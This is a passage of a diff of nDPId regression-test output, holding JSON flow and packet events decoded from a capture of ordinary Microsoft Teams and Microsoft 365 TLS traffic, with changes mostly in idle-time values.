4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611} 
00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} 
-00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 
4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1587041676642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676642,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5PAqAEGKH4JBex2AbukS07qokMa3IAQEAn5EwAAAQEICjCEmIFVAL3h"} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676612,"flow_last_seen":1587041676643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041676643,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677042,"flow_last_seen":1587041677042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677042,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1587041677042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677042,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex3AbvbPWM6AAAAALAC\/\/\/8iwAAAgQFtAEDAwUBAQgKMISaAAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041677088,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8FwhAAGwGtHI0ck0hwKgBBgG77Hf6fNLR2z1jO6ASIACfvwAAAgQFoAEDAwgEAggKYRMfbzCEmgA="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677088,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex3AbvbPWM7+nzS0oAQEAneQwAAAQEICjCEmixhEx9v"} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677042,"flow_last_seen":1587041677088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041677088,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01501{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":167,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041677042,"flow_last_seen":1587041677186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5981,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1587041677186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041677243,"flow_last_seen":1587041677243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041677243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1587041677243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041677243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx4Abt\/TkvVAAAAALAC\/\/\/5uQAAAgQFtAEDAwUBAQgKMISawwAAAAAEAgAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041677255,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0wUlAAHUGi9Y0ccKEwKgBBgG77Hiki1UTf05L1oAS\/\/8DeQAAAgQFoAEDAwgBAQQC"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677255,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx4Abt\/TkvWpItVFFAQIAAkOAAA"} 
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041677243,"flow_last_seen":1587041677255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041677255,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 